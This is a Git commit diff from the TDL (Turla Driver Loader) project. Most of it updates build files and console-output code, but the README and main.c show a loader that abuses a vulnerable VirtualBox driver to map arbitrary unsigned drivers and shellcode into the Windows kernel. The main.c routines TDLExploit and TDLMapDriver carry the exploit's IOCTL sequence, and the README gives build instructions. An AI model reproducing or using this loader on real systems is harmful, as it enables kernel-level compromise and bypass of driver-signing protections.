nopriest
/
TDL
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

v 1.1.4 

Fixed #29, project ported to MSVS2017.
This commit is contained in:
hfiref0x 2019-01-05 14:58:41 +07:00
parent 1794592f64
commit 8cb23174a1
12 changed files with 9109 additions and 4503 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Furutaka.exe
View File

Binary file not shown.

14
README.md
View File

@ -33,13 +33,25 @@ It uses WinNT/Turla VirtualBox kernel mode exploit technique to write code to th
TDL comes with full source code. TDL comes with full source code.
In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above. In order to build from source you need Microsoft Visual Studio 2015 U1 and later versions. For driver builds you need Microsoft Windows Driver Kit 8.1 and/or above.
## Instructions
* Select Platform ToolSet first for project in solution you want to build (Project->Properties->General):
* v120 for Visual Studio 2013;
* v140 for Visual Studio 2015;
* v141 for Visual Studio 2017.
* For v140 and above set Target Platform Version (Project->Properties->General):
* If v140 then select 8.1 (Note that Windows 8.1 SDK must be installed);
* If v141 then select 10.0.17763.0 (Note that Windows 10.0.17763 SDK must be installed).
Remove linker option /NOCOFFGRPINFO where it unsupported/unavailable.
# Deprecation # Deprecation
TDL based on old Oracle VirtualBox driver which was created in 2008. This driver wasn't designed to be compatible with newest Windows operation system versions and may work incorrectly. Because TDL entirely based on this exact VirtualBox driver version LPE it is not wise to use it on newest version of Windows. Consider this repository as depricated/abandonware. The only possible updates can be related only to TDL loader itself. TDL based on old Oracle VirtualBox driver which was created in 2008. This driver wasn't designed to be compatible with newest Windows operation system versions and may work incorrectly. Because TDL entirely based on this exact VirtualBox driver version LPE it is not wise to use it on newest version of Windows. Consider this repository as depricated/abandonware. The only possible updates can be related only to TDL loader itself.
# Authors # Authors
(c) 2016 - 2018 TDL Project (c) 2016 - 2019 TDL Project
# Credits # Credits

28
Source/Furutaka/Furutaka.vcxproj
View File

@ -1,5 +1,5 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|x64"> <ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration> <Configuration>Debug</Configuration>
@ -14,21 +14,20 @@
<ProjectGuid>{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}</ProjectGuid> <ProjectGuid>{8CC15B84-9FA8-4F5E-934F-7DAE7BAC4896}</ProjectGuid>
<Keyword>Win32Proj</Keyword> <Keyword>Win32Proj</Keyword>
<RootNamespace>Furutaka</RootNamespace> <RootNamespace>Furutaka</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion> <WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
<ProjectName>Furutaka</ProjectName> <ProjectName>Furutaka</ProjectName>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset> <PlatformToolset>v141</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset> <PlatformToolset>v141</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
@ -47,7 +46,7 @@
<LinkIncremental>true</LinkIncremental> <LinkIncremental>true</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir> <OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir> <IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet> <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental> <LinkIncremental>false</LinkIncremental>
@ -63,8 +62,8 @@
<WarningLevel>Level4</WarningLevel> <WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization> <Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs> <CompileAs>CompileAsC</CompileAs>
<BufferSecurityCheck>false</BufferSecurityCheck>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
@ -78,7 +77,7 @@
<WarningLevel>Level4</WarningLevel> <WarningLevel>Level4</WarningLevel>
<PrecompiledHeader> <PrecompiledHeader>
</PrecompiledHeader> </PrecompiledHeader>
<Optimization>Full</Optimization> <Optimization>MinSpace</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking> <FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
@ -86,9 +85,13 @@
<MultiProcessorCompilation>true</MultiProcessorCompilation> <MultiProcessorCompilation>true</MultiProcessorCompilation>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<EnablePREfast>false</EnablePREfast> <EnablePREfast>false</EnablePREfast>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FavorSizeOrSpeed>Neither</FavorSizeOrSpeed> <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<SDLCheck>true</SDLCheck> <ControlFlowGuard>false</ControlFlowGuard>
<TreatWarningAsError>true</TreatWarningAsError>
<BufferSecurityCheck>false</BufferSecurityCheck>
<AssemblerOutput>AssemblyCode</AssemblerOutput>
<AssemblerListingLocation>$(IntDir)\asmlist\</AssemblerListingLocation>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>
@ -98,6 +101,9 @@
<EntryPointSymbol>TDLMain</EntryPointSymbol> <EntryPointSymbol>TDLMain</EntryPointSymbol>
<SetChecksum>true</SetChecksum> <SetChecksum>true</SetChecksum>
<UACExecutionLevel>RequireAdministrator</UACExecutionLevel> <UACExecutionLevel>RequireAdministrator</UACExecutionLevel>
<Version>6.0</Version>
<ShowProgress>LinkVerboseLib</ShowProgress>
<AdditionalOptions>/NOCOFFGRPINFO %(AdditionalOptions)</AdditionalOptions>
</Link> </Link>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>

2
Source/Furutaka/Furutaka.vcxproj.user
View File

@ -5,7 +5,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys</LocalDebuggerCommandArguments> <LocalDebuggerCommandArguments>c:\altair\tsugumi.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor> <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup> </PropertyGroup>
</Project> </Project>

196
Source/Furutaka/cui.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 - 2017 * (C) COPYRIGHT AUTHORS, 2016 - 2018
* *
* TITLE: CUI.C * TITLE: CUI.C
* *
* VERSION: 1.10 * VERSION: 1.30
* *
* DATE: 20 Mar 2017 * DATE: 01 Aug 2018
* *
* Console output. * Console output.
* *
@ -18,20 +18,93 @@
*******************************************************************************/ *******************************************************************************/
#include "global.h" #include "global.h"
HANDLE g_ConOut = NULL, g_ConIn = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
/*
* cuiInitialize
*
* Purpose:
*
* Initialize console input/output.
*
*/
VOID cuiInitialize(
_In_ BOOL InitInput,
_Out_opt_ PBOOL IsConsoleOutput
)
{
ULONG dummy;
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (InitInput) g_ConIn = GetStdHandle(STD_INPUT_HANDLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dummy)) {
g_ConsoleOutput = FALSE;
WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dummy, NULL);
}
if (IsConsoleOutput)
*IsConsoleOutput = g_ConsoleOutput;
return;
}
/*
* cuiClrScr
*
* Purpose:
*
* Clear screen.
*
*/
VOID cuiClrScr(
VOID
)
{
COORD coordScreen;
DWORD cCharsWritten;
DWORD dwConSize;
CONSOLE_SCREEN_BUFFER_INFO csbi;
coordScreen.X = 0;
coordScreen.Y = 0;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
dwConSize = csbi.dwSize.X * csbi.dwSize.Y;
if (!FillConsoleOutputCharacter(g_ConOut, TEXT(' '),
dwConSize, coordScreen, &cCharsWritten))
return;
if (!GetConsoleScreenBufferInfo(g_ConOut, &csbi))
return;
if (!FillConsoleOutputAttribute(g_ConOut, csbi.wAttributes,
dwConSize, coordScreen, &cCharsWritten))
return;
SetConsoleCursorPosition(g_ConOut, coordScreen);
}
/* /*
* cuiPrintTextA * cuiPrintTextA
* *
* Purpose: * Purpose:
* *
* Output text to the console or file. * Output text to the console or file.
* * ANSI version.
* ANSI variant
* *
*/ */
VOID cuiPrintTextA( VOID cuiPrintTextA(
_In_ HANDLE hOutConsole,
_In_ LPSTR lpText, _In_ LPSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn _In_ BOOL UseReturn
) )
{ {
@ -46,7 +119,7 @@ VOID cuiPrintTextA(
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return; return;
consoleIO = (5 + consoleIO); consoleIO = 5 + consoleIO;
Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) { if (Buffer) {
@ -55,11 +128,11 @@ VOID cuiPrintTextA(
consoleIO = _strlen_a(Buffer); consoleIO = _strlen_a(Buffer);
if (ConsoleOutputEnabled != FALSE) { if (g_ConsoleOutput != FALSE) {
WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); WriteConsoleA(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
} }
else { else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); WriteFile(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
} }
HeapFree(GetProcessHeap(), 0, Buffer); HeapFree(GetProcessHeap(), 0, Buffer);
} }
@ -71,43 +144,80 @@ VOID cuiPrintTextA(
* Purpose: * Purpose:
* *
* Output text to the console or file. * Output text to the console or file.
* * UNICODE version.
* UNICODE variant
* *
*/ */
VOID cuiPrintTextW( VOID cuiPrintTextW(
_In_ HANDLE hOutConsole, _In_ LPWSTR lpText,
_In_ LPWSTR lpText, _In_ BOOL UseReturn
_In_ BOOL ConsoleOutputEnabled, )
{
SIZE_T consoleIO;
DWORD bytesIO;
LPWSTR Buffer;
if (lpText == NULL)
return;
consoleIO = _strlen_w(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat_w(Buffer, TEXT("\r\n"));
consoleIO = _strlen_w(Buffer);
if (g_ConsoleOutput != FALSE) {
WriteConsoleW(g_ConOut, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(g_ConOut, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
}
/*
* cuiPrintTextLastErrorA
*
* Purpose:
*
* Output LastError translated code to the console or file.
* ANSI version.
*
*/
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
)
{
CHAR szTextBuffer[512];
DWORD dwLastError = GetLastError();
FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPSTR)&szTextBuffer, 512, NULL);
cuiPrintTextA(szTextBuffer, UseReturn);
}
/*
* cuiPrintTextLastErrorW
*
* Purpose:
*
* Output LastError translated code to the console or file.
* UNICODE version.
*
*/
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn _In_ BOOL UseReturn
) )
{ {
SIZE_T consoleIO; WCHAR szTextBuffer[512];
DWORD bytesIO; DWORD dwLastError = GetLastError();
LPWSTR Buffer;
if (lpText == NULL) FormatMessageW(FORMAT_MESSAGE_FROM_SYSTEM, NULL, dwLastError, LANG_USER_DEFAULT, (LPWSTR)&szTextBuffer, 512, NULL);
return; cuiPrintTextW(szTextBuffer, UseReturn);
consoleIO = _strlen(lpText);
if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4))
return;
consoleIO = (5 + consoleIO) * sizeof(WCHAR);
Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
consoleIO = _strlen(Buffer);
if (ConsoleOutputEnabled != FALSE) {
WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL);
}
else {
WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL);
}
HeapFree(GetProcessHeap(), 0, Buffer);
}
} }

50
Source/Furutaka/cui.h
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 - 2017 * (C) COPYRIGHT AUTHORS, 2016 - 2018
* *
* TITLE: CUI.H * TITLE: CUI.H
* *
* VERSION: 1.10 * VERSION: 1.30
* *
* DATE: 04 Feb 2017 * DATE: 01 Aug 2018
* *
* Common header file for console ui. * Common header file for console ui.
* *
@ -18,22 +18,38 @@
*******************************************************************************/ *******************************************************************************/
#pragma once #pragma once
VOID cuiPrintTextA( VOID cuiInitialize(
_In_ HANDLE hOutConsole, _In_ BOOL InitInput,
_In_ LPSTR lpText, _Out_opt_ PBOOL IsConsoleOutput
_In_ BOOL ConsoleOutputEnabled, );
_In_ BOOL UseReturn
);
VOID cuiPrintTextW( #ifdef _UNICODE
_In_ HANDLE hOutConsole,
_In_ LPWSTR lpText,
_In_ BOOL ConsoleOutputEnabled,
_In_ BOOL UseReturn
);
#ifdef UNICODE
#define cuiPrintText cuiPrintTextW #define cuiPrintText cuiPrintTextW
#define cuiPrintTextLastError cuiPrintTextLastErrorW
#else #else
#define cuiPrintText cuiPrintTextA #define cuiPrintText cuiPrintTextA
#define cuiPrintTextLastError cuiPrintTextLastErrorA
#endif #endif
VOID cuiPrintTextA(
_In_ LPSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextW(
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorA(
_In_ BOOL UseReturn
);
VOID cuiPrintTextLastErrorW(
_In_ BOOL UseReturn
);
VOID cuiClrScr(
VOID
);

14
Source/Furutaka/global.h
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 - 2017 * (C) COPYRIGHT AUTHORS, 2016 - 2019
* *
* TITLE: GLOBAL.H * TITLE: GLOBAL.H
* *
* VERSION: 1.11 * VERSION: 1.14
* *
* DATE: 20 Apr 2017 * DATE: 05 Jan 2019
* *
* Common header file for the program support routines. * Common header file for the program support routines.
* *
@ -21,10 +21,7 @@
//disable nonmeaningful warnings. //disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition #pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) //exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include <Windows.h> #include <Windows.h>
#include <ntstatus.h> #include <ntstatus.h>
@ -40,11 +37,14 @@
#error ANSI build is not supported #error ANSI build is not supported
#endif #endif
#if (_MSC_VER >= 1900) #if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
#ifdef _DEBUG #ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib") #pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib") #pragma comment(lib, "ucrtd.lib")
#else #else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib") #pragma comment(lib, "libvcruntime.lib")
#endif #endif
#endif #endif
#endif

216
Source/Furutaka/main.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 - 2018 * (C) COPYRIGHT AUTHORS, 2016 - 2019
* *
* TITLE: MAIN.C * TITLE: MAIN.C
* *
* VERSION: 1.13 * VERSION: 1.14
* *
* DATE: 09 Mar 2018 * DATE: 05 Jan 2019
* *
* Furutaka entry point. * Furutaka entry point.
* *
@ -18,7 +18,6 @@
*******************************************************************************/ *******************************************************************************/
#include "global.h" #include "global.h"
#include <process.h>
#include "vbox.h" #include "vbox.h"
#include "shellcode.h" #include "shellcode.h"
@ -28,24 +27,21 @@ volatile LONG g_lApplicationInstances = 0;
#pragma comment(linker, "/Section:shrd,RWS") #pragma comment(linker, "/Section:shrd,RWS")
HINSTANCE g_hInstance; HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
HANDLE g_hVBox = INVALID_HANDLE_VALUE; HANDLE g_hVBox = INVALID_HANDLE_VALUE;
BOOL g_ConsoleOutput = FALSE;
BOOL g_VBoxInstalled = FALSE; BOOL g_VBoxInstalled = FALSE;
WCHAR g_BE = 0xFEFF;
ULONG g_NtBuildNumber = 0; ULONG g_NtBuildNumber = 0;
#define VBoxDrvSvc TEXT("VBoxDrv") #define VBoxDrvSvc TEXT("VBoxDrv")
#define supImageName "furutaka" #define supImageName "furutaka"
#define supImageHandle 0x1a000 #define supImageHandle 0x1a000
#define PAGE_SIZE 0x1000
#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.3 (09/03/18)") #define T_LOADERTITLE TEXT("Turla Driver Loader v1.1.4 (05/01/19)")
#define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n")
#define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n")
#define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") #define T_LOADERUSAGE TEXT("Usage: loader DriverToLoad\n\re.g. loader mydrv.sys\r\n")
#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.3 started\r\n(c) 2016 - 2018 TDL Project\r\nSupported x64 OS : 7 and above\r\n") #define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.4 started\r\n(c) 2016 - 2019 TDL Project\r\nSupported x64 OS : 7 and above\r\n")
#define T_VBOXDETECT TEXT("Ldr: Detected VirtualBox software installation, driver backup will be done")
/* /*
* TDLVBoxInstalled * TDLVBoxInstalled
@ -149,7 +145,7 @@ ULONG_PTR TDLGetProcAddress(
ULONG_PTR pfn = 0; ULONG_PTR pfn = 0;
RtlInitString(&cStr, FunctionName); RtlInitString(&cStr, FunctionName);
if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID*)&pfn)))
return 0; return 0;
return KernelBase + (pfn - KernelImage); return KernelBase + (pfn - KernelImage);
@ -243,7 +239,7 @@ void TDLExploit(
&Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie,
SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL))
{ {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), TRUE);
break; break;
} }
@ -261,19 +257,19 @@ void TDLExploit(
SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr,
SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL))
{ {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x"));
u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
ImageBase = OpenLdr.u.Out.pvImageBase; ImageBase = OpenLdr.u.Out.pvImageBase;
memIO = PAGE_SIZE + CodeSize; memIO = PAGE_SIZE + CodeSize;
NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID*)&pLoadTask, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (pLoadTask == NULL) if (pLoadTask == NULL)
@ -299,7 +295,7 @@ void TDLExploit(
pLoadTask, pLoadTask->Hdr.cbIn, pLoadTask, pLoadTask->Hdr.cbIn,
pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL))
{ {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), TRUE);
break; break;
} }
else { else {
@ -310,7 +306,7 @@ void TDLExploit(
_strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); _strcat(text, TEXT("\r\n\tDriver image mapped at 0x"));
u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text)); u64tohex((ULONG_PTR)ImageBase + DataOffset, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); RtlSecureZeroMemory(&vmFast, sizeof(vmFast));
@ -326,21 +322,21 @@ void TDLExploit(
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN,
&vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL))
{ {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), TRUE);
break; break;
} }
else { else {
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), TRUE);
} }
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), TRUE);
paramOut = 0; paramOut = 0;
DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP,
NULL, 0, NULL, 0,
&paramOut, sizeof(paramOut), &bytesIO, NULL); &paramOut, sizeof(paramOut), &bytesIO, NULL);
cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: SUP_IOCTL_LDR_FREE"), TRUE);
RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree));
ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie;
@ -360,7 +356,7 @@ void TDLExploit(
if (pLoadTask != NULL) { if (pLoadTask != NULL) {
memIO = 0; memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); NtFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&pLoadTask, &memIO, MEM_RELEASE);
} }
if (g_hVBox != INVALID_HANDLE_VALUE) { if (g_hVBox != INVALID_HANDLE_VALUE) {
@ -400,19 +396,19 @@ UINT TDLMapDriver(
_strcpy(text, TEXT("Ldr: Kernel base = 0x")); _strcpy(text, TEXT("Ldr: Kernel base = 0x"));
u64tohex(KernelBase, _strend(text)); u64tohex(KernelBase, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
RtlSecureZeroMemory(&uStr, sizeof(uStr)); RtlSecureZeroMemory(&uStr, sizeof(uStr));
RtlInitUnicodeString(&uStr, lpDriverFullName); RtlInitUnicodeString(&uStr, lpDriverFullName);
status = LdrLoadDll(NULL, &DllCharacteristics, &uStr, (PVOID)&Image); status = LdrLoadDll(NULL, &DllCharacteristics, &uStr, (PVOID*)&Image);
if ((!NT_SUCCESS(status)) || (Image == NULL)) { if ((!NT_SUCCESS(status)) || (Image == NULL)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading input driver file"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error while loading input driver file"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: Input driver file loaded at 0x")); _strcpy(text, TEXT("Ldr: Input driver file loaded at 0x"));
u64tohex((ULONG_PTR)Image, _strend(text)); u64tohex((ULONG_PTR)Image, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
FileHeader = RtlImageNtHeader(Image); FileHeader = RtlImageNtHeader(Image);
@ -421,69 +417,69 @@ UINT TDLMapDriver(
isz = FileHeader->OptionalHeader.SizeOfImage; isz = FileHeader->OptionalHeader.SizeOfImage;
